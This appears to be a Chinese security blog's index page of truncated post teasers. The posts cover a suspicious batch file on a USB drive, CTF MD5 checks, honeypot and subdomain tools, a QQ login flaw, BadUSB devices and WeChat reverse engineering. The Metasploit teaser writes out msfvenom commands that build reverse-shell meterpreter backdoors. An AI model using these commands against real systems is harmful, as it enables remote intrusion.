-
来买个小内存u盘么咯?盘内带电脑垃圾清理.bat那种
在某宝个别店铺购买了小内存u盘到货后插入电脑,发现自带了一个名为电脑垃圾清理的小程序。对就是这货怀揣着这家店真好,还带了垃圾清理软件的想法,我试着运行了软件.但是好像没有卵用.正好小表弟好像对这个比较了解,我去问问他咋回事儿小表弟下班回家后...
-
CTF之md5截断比较验证填坑
背景CTF有个特别狗,也特别烦的东西,就是MD5截断验证,今天我就遇到了.正文嗯,举个栗子啥意思呢?就是说,验证明文(Code)+随机字符串(fTyHgZII)在md5加密之后截取前六位等于b77333来,看效果注释有了,按题目需求,直接改...
-
Metasploit笔记
生成exe后门msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe -o 1987.exe生成PHP后门msfvenom -p php/meterpre...
-
Hfish企业安全测试主动攻击型蜜罐钓鱼框架系统
HFish 是一款基于 Golang 开发的跨平台多功能主动攻击型蜜罐钓鱼平台框架系统,为了企业安全防护测试做出了精心的打造多功能 不仅仅支持 HTTP(S) 钓鱼,还支持 SSH、SFTP、Redis、Mysql 等扩展性 提供...
-
OneForAll一款功能强大的子域收集工具
OneForAll是一款功能强大的子域收集工具项目简介在渗透测试中信息收集的重要性不言而喻,子域收集是信息收集中必不可少且非常重要的一环,目前网上也开源了许多子域收集的工具,但是总是存在以下部分问题:不够强大,子域收集的接口不够多,不能做到...
-
《故事会》20年前的纸上暗网
在互联网还不发达的年代,大多数男生的童年的精神世界是如此匮乏,以至于在老旧的台式机上玩把《红警》,都能成为最高级的享受。但打游戏要偷偷摸摸,往往危险而且时间短暂,那个年代,大多数人的精神享受往往还是来源于阅读。在金庸著作都被翻烂之后,很多男...
-
腾讯QQ快速登录漏洞
前言一婊哥说他把这洞提交给腾讯,腾讯说没有危害还说会修复,修复就修复还不给 Rank (婊哥还说腾讯就想白P)正文今天我想着到来写点日记。。毕竟总是忘了这忘了那的。然后打开我亲爱的有道云.点了下QQ快速登录。。发现。。调...
-
打造属于自己的渗透神器之 wifi-ducky.
在之前的打造属于自己的渗透神器系列中的 badusb 文章中作者发现大家普遍反映 Digispark 开发板做的 badusb 他只能执行一次编写好的命令,如果插上去失效了那就没有办法执行了。如果使用树莓派 zero w 和 P4wnP1...
-
PC微信逆向:发送与接收消息的分析与代码实现
我们先来定位一下消息接收函数,这对我们后面分析消息发送函数会有所帮助定位消息接收函数的相关思路与接收消息函数最直接相关的东西肯定是消息本身,所以消息本身的内容就是我们的切入点。我们可以首先找到存放消息内容的地址,然后对地址下断,通过栈回溯最...